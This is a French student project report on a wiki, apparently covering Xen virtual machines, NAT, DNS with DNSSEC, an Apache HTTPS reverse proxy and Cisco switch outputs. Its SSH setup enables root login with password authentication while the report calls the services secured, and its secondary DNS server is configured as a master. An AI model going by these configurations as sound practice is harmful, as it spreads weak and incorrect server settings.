 Utilization mark (high/low)    : 100 / 0&lt;br /&gt;
 Total addresses                : 254&lt;br /&gt;
 Leased addresses               : 1&lt;br /&gt;
 Excluded addresses             : 150&lt;br /&gt;
 Current index        IP address range                    Leased/Excluded/Total&lt;br /&gt;
 10.60.15.156         10.60.15.1       - 10.60.15.254      1     / 150   / 254&lt;br /&gt;
&lt;br /&gt;
C9200-E304#show ip dhcp binding | include 10.60.15&lt;br /&gt;
10.60.15.153    ff39.5adc.c800.0100.    Feb 27 2026 08:59 PM    Automatic  Active     Vlan25&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Policy‑Based Routing (PBR) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
C9200-E304#show route-map PBR_VLAN25&lt;br /&gt;
route-map PBR_VLAN25, permit, sequence 10&lt;br /&gt;
  Match clauses:&lt;br /&gt;
    ip address (access-lists): TRAFIC_VLAN25 &lt;br /&gt;
  Set clauses:&lt;br /&gt;
    ip next-hop 193.48.57.167&lt;br /&gt;
  Policy routing matches: 3128 packets, 1082288 bytes&lt;br /&gt;
&lt;br /&gt;
C9200-E304#show ip access-lists TRAFIC_VLAN25&lt;br /&gt;
Extended IP access list TRAFIC_VLAN25&lt;br /&gt;
    10 permit ip 10.60.15.0 0.0.0.255 any (3128 matches)&lt;br /&gt;
&lt;br /&gt;
C9200-E304#show ip policy&lt;br /&gt;
Interface      Route map&lt;br /&gt;
Vlan25         PBR_VLAN25&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Trunk vers le point d’accès :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
C9200-E304#show interfaces trunk&lt;br /&gt;
Port        Mode             Encapsulation  Status        Native vlan  &lt;br /&gt;
Gi1/0/1     on               802.1q         trunking      1&lt;br /&gt;
&lt;br /&gt;
Port        Vlans allowed and active in management domain&lt;br /&gt;
Gi1/0/1     1-2,11-12,15-16,19-20,23-25,28,530&lt;br /&gt;
&lt;br /&gt;
C9200-E304#show interfaces GigabitEthernet1/0/1 switchport&lt;br /&gt;
Name: Gi1/0/1&lt;br /&gt;
Switchport: Enabled&lt;br /&gt;
Administrative Mode: trunk&lt;br /&gt;
Operational Mode: trunk&lt;br /&gt;
Trunking VLANs Enabled: ALL&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Réseau basique et avancé ==&lt;br /&gt;
&lt;br /&gt;
Routes sur E304 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
C9200-E304#show ip route | include 10.60.15&lt;br /&gt;
C        10.60.15.0/24 is directly connected, Vlan25&lt;br /&gt;
&lt;br /&gt;
C9200-E304#show ip route 0.0.0.0&lt;br /&gt;
Gateway of last resort is 193.48.57.162 to network 0.0.0.0&lt;br /&gt;
O*E2  0.0.0.0/0 [110/1] via 193.48.57.162, Vlan2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connectivité depuis Moon vers la passerelle VLAN 25 :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
ping -c 3 10.60.15.1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
PING 10.60.15.1 (10.60.15.1) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.15.1: icmp_seq=1 ttl=253 time=1.35 ms&lt;br /&gt;
64 bytes from 10.60.15.1: icmp_seq=2 ttl=253 time=2.09 ms&lt;br /&gt;
64 bytes from 10.60.15.1: icmp_seq=3 ttl=253 time=1.17 ms&lt;br /&gt;
&lt;br /&gt;
--- 10.60.15.1 ping statistics ---&lt;br /&gt;
3 packets transmitted, 3 received, 0% packet loss, time 2003ms&lt;br /&gt;
rtt min/avg/max/mdev = 1.171/1.536/2.091/0.398 ms&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
= Conclusion =&lt;br /&gt;
L’infrastructure déployée répond à toutes les exigences du projet :&lt;br /&gt;
* Virtualisation Xen avec séparation des rôles (services / mandataire)&lt;br /&gt;
* Services sécurisés : SSH redirigé, DNS maître/esclave avec DNSSEC, HTTPS avec certificat Gandi, proxy inverse IPv4&lt;br /&gt;
* Filtrage des attaques par fail2ban&lt;br /&gt;
* Réseau redondant avec VRRP, DHCP, et Policy‑Based Routing&lt;br /&gt;
* WiFi sécurisé par WPA2‑EAP avec FreeRADIUS&lt;br /&gt;
* Tests d’intrusion concluants sur WEP et WPA2‑PSK&lt;br /&gt;
* Chiffrement de données avec LUKS&lt;br /&gt;
&lt;br /&gt;
L’ensemble est fonctionnel et démontre une maîtrise des technologies mises en œuvre.&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12476</id>
		<title>Atelier SysRes SE4 2025/2026 E15</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12476"/>
		<updated>2026-02-27T12:10:38Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&amp;lt;div class=&amp;quot;titlepage&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div class=&amp;quot;figure&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:polytech_logo.png|image]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
'''Rapport de Projet SE4 IdO'''                                                                                             '''Année Universitaire 2025-2026'''&lt;br /&gt;
&lt;br /&gt;
'''Étudiant: Mohamed SALHI'''                                                           '''Binôme: SE4.Solstice (mandataire) - SE4.Moon (services)'''&lt;br /&gt;
&lt;br /&gt;
'''Domaine: &amp;lt;code&amp;gt;msalhi.online&amp;lt;/code&amp;gt;'''&lt;br /&gt;
&amp;lt;/div&amp;gt;&amp;lt;span id=&amp;quot;introduction&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
Ce rapport documente la réalisation complète du projet de sécurité système et réseau dans le cadre du module SE4 IdO (Internet des Objets). L’objectif principal était de mettre en place une infrastructure réseau complète avec services virtualisés, en mettant l’accent sur la sécurité et la redondance.&lt;br /&gt;
&lt;br /&gt;
L’architecture repose sur une approche '''dual-stack IPv4/IPv6''' avec :&lt;br /&gt;
&lt;br /&gt;
* Une '''machine de services''' (SE4.Moon) hébergeant les services applicatifs&lt;br /&gt;
* Une '''machine mandataire''' (SE4.Solstice) gérant les accès IPv4 via NAT et proxy inverse&lt;br /&gt;
* Une infrastructure réseau redondante avec routeurs Cisco C9200&lt;br /&gt;
* Des services sécurisés (DNS avec DNSSEC, HTTPS avec certificats, SSH avec filtrage)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;atelier-système-et-réseau---machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Atelier système et réseau - Machines virtuelles =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;création-des-machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Création des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Les machines virtuelles ont été créées sur l’hyperviseur Xen du Dom0 &amp;lt;code&amp;gt;capbreton.plil.info&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;commandes-de-création&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Commandes de création ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création de la machine de services SE4.Moon&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Moon --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&lt;br /&gt;
&lt;br /&gt;
# Création de la machine mandataire SE4.Solstice&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Solstice --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;démarrage-et-connexion&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Démarrage et connexion ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Démarrage des VMs&lt;br /&gt;
xen create /etc/xen/SE4.Moon.cfg&lt;br /&gt;
xen create /etc/xen/SE4.Solstice.cfg&lt;br /&gt;
&lt;br /&gt;
# Connexion aux consoles&lt;br /&gt;
xen console SE4.Moon&lt;br /&gt;
xen console SE4.Solstice&lt;br /&gt;
&lt;br /&gt;
# Liste des VMs actives&lt;br /&gt;
root@capbreton:~# xen list&lt;br /&gt;
Name                                        ID   Mem VCPUs    State   Time(s)&lt;br /&gt;
SE4.Solstice                                39  2048     1     -b----    2560.1&lt;br /&gt;
SE4.Moon                                   119  2048     1     -b----     452.3&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-de-services-se4.moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine de services (SE4.Moon) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;montage-des-partitions-lvm-pour-var-et-home&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Montage des partitions LVM pour /var et /home ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création des fichiers de partition sur le Dom0&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.var virtual&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.home virtual&lt;br /&gt;
&lt;br /&gt;
# Modification du fichier de configuration Xen&lt;br /&gt;
disk = [&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/disk.img,xvda2,w',&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/swap.img,xvda1,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.home,xvdb,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.var,xvdc,w',&lt;br /&gt;
]&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;formatage-et-montage-des-partitions&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Formatage et montage des partitions ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Formatage des partitions&lt;br /&gt;
mkfs -t ext4 /dev/xvdb&lt;br /&gt;
mkfs -t ext4 /dev/xvdc&lt;br /&gt;
&lt;br /&gt;
# Montage temporaire et copie des données&lt;br /&gt;
mount /dev/xvdc /mnt&lt;br /&gt;
mv /var/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
mount /dev/xvdb /mnt&lt;br /&gt;
mv /home/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
# Configuration du fstab&lt;br /&gt;
cat &amp;gt; /etc/fstab &amp;lt;&amp;lt; EOF&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvdb /home ext4 defaults 0 2&lt;br /&gt;
/dev/xvdc /var ext4 defaults 0 2&lt;br /&gt;
EOF&lt;br /&gt;
&lt;br /&gt;
# Application des modifications&lt;br /&gt;
mount -a&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface réseau privée (vers Solstice)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.2/24&lt;br /&gt;
    gateway 192.168.20.1&lt;br /&gt;
&lt;br /&gt;
# Configuration IPv6 automatique&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Moon:~# ip a show eth0&lt;br /&gt;
2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 192.168.20.2/24 brd 192.168.20.255 scope global eth0&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe6f:f547/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;installation-des-paquets-de-base&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Installation des paquets de base ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;apt update &amp;amp;&amp;amp; apt upgrade -y&lt;br /&gt;
apt install -y ssh apache2 bind9 bind9utils \&lt;br /&gt;
  fail2ban openssl iptables-persistent \&lt;br /&gt;
  net-tools curl wget vim&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-mandataire-se4.solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine mandataire (SE4.Solstice) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau-1&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface publique (réseau routé)&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
    address 193.48.57.167/27&lt;br /&gt;
    gateway 193.48.57.162  # Adresse VRRP virtuelle&lt;br /&gt;
&lt;br /&gt;
iface eth1 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Interface privée (vers Moon)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.1/24&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Solstice:~# ip a show eth1&lt;br /&gt;
3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 193.48.57.167/27 brd 193.48.57.191 scope global eth1&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe29:880f/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;mise-en-place-de-la-mascarade-nat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Mise en place de la mascarade (NAT) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Activation du forwarding IP&lt;br /&gt;
echo &amp;quot;net.ipv4.ip_forward=1&amp;quot; &amp;gt;&amp;gt; /etc/sysctl.conf&lt;br /&gt;
sysctl -p&lt;br /&gt;
&lt;br /&gt;
# Règles iptables pour la mascarade&lt;br /&gt;
iptables -t nat -A POSTROUTING -s 192.168.20.0/24 -o eth1 -j MASQUERADE&lt;br /&gt;
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT&lt;br /&gt;
iptables -A FORWARD -i eth1 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde pour persistance&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Ajout dans interfaces pour chargement au démarrage&lt;br /&gt;
post-up iptables-restore &amp;lt; /etc/iptables/rules.v4&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;services-internet&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Services Internet =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-ssh&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur SSH ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-ssh-sur-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration SSH sur Moon ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Édition du fichier de configuration&lt;br /&gt;
vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
# Modifications apportées :&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
PasswordAuthentication yes&lt;br /&gt;
Port 22&lt;br /&gt;
# LogLevel VERBOSE&lt;br /&gt;
&lt;br /&gt;
# Redémarrage du service&lt;br /&gt;
systemctl restart ssh&lt;br /&gt;
systemctl enable ssh&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;redirection-de-ports-pour-laccès-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Redirection de ports pour l’accès IPv4 ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Redirection du port 2201 vers Moon (SSH)&lt;br /&gt;
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 2201 \&lt;br /&gt;
  -j DNAT --to-destination 192.168.20.2:22&lt;br /&gt;
&lt;br /&gt;
iptables -A FORWARD -p tcp -d 192.168.20.2 --dport 22 -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Test de la redirection&lt;br /&gt;
ssh -p 2201 root@193.48.57.167  # Arrive sur Moon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-dns&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-maître-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur maître (Moon) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;default&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
    allow-transfer { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe47:bbe7;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    also-notify { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    notify yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Fichier de zone /etc/bind/zones/db.msalhi.online&lt;br /&gt;
$TTL 86400&lt;br /&gt;
@   IN  SOA ns1.msalhi.online. admin.msalhi.online. (&lt;br /&gt;
        2026020320  ; Serial INCRÉMENTÉ et corrigé&lt;br /&gt;
        3600        ; Refresh&lt;br /&gt;
        1800        ; Retry&lt;br /&gt;
        604800      ; Expire&lt;br /&gt;
        86400       ; Minimum TTL&lt;br /&gt;
    )&lt;br /&gt;
&lt;br /&gt;
; Serveurs de noms&lt;br /&gt;
@       IN  NS  ns1.msalhi.online.&lt;br /&gt;
@       IN  NS  ns1.merteuil.tech.&lt;br /&gt;
&lt;br /&gt;
; Enregistrements&lt;br /&gt;
@       IN  A       193.48.57.167&lt;br /&gt;
@       IN  AAAA    2001:660:4401:60a0:216:3eff:fe6f:f548&lt;br /&gt;
ns1     IN  A       193.48.57.167&lt;br /&gt;
ns1     IN  AAAA    2001:660:4401:60a0:216:3eff:fe6f:f548&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
www     IN  CNAME   msalhi.online.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
named-checkzone msalhi.online /etc/bind/zones/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-secondaire-solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur secondaire (Solstice) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;default&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
    allow-transfer { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe47:bbe7;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    also-notify { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    notify yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
ls -la /var/lib/bind/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-chez-le-registrar-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration chez le registrar Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNS chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Type'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Description'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Nameservers&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS primaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;|&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.merteuil.tech&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS secondaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 1&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv6: 2001:660:4401:60a0:216:3eff:fe47:bbe7&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 2&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns2.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv4: 193.48.57.167&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-site-web-par-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de site Web par certificat ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;génération-du-csr-et-obtention-du-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Génération du CSR et obtention du certificat ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Génération de la clé privée&lt;br /&gt;
openssl genrsa -out /etc/ssl/private/myserver.key 2048&lt;br /&gt;
&lt;br /&gt;
# Génération du CSR&lt;br /&gt;
openssl req -new -key /etc/ssl/private/myserver.key \&lt;br /&gt;
  -out /etc/ssl/private/server.csr&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-apache-sur-moon-https-direct-ipv6&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration Apache sur Moon (HTTPS direct IPv6) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-ssl.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    DocumentRoot /var/www/html&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    Header always set Strict-Transport-Security &amp;quot;max-age=63072000; includeSubDomains&amp;quot;&lt;br /&gt;
    Header always set X-Frame-Options DENY&lt;br /&gt;
    Header always set X-Content-Type-Options nosniff&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/msalhi_ssl_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/msalhi_ssl_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
a2ensite msalhi-ssl.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-proxy-inverse-sur-solstice-https-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du proxy inverse sur Solstice (HTTPS IPv4) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-proxy.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
    ProxyPreserveHost On&lt;br /&gt;
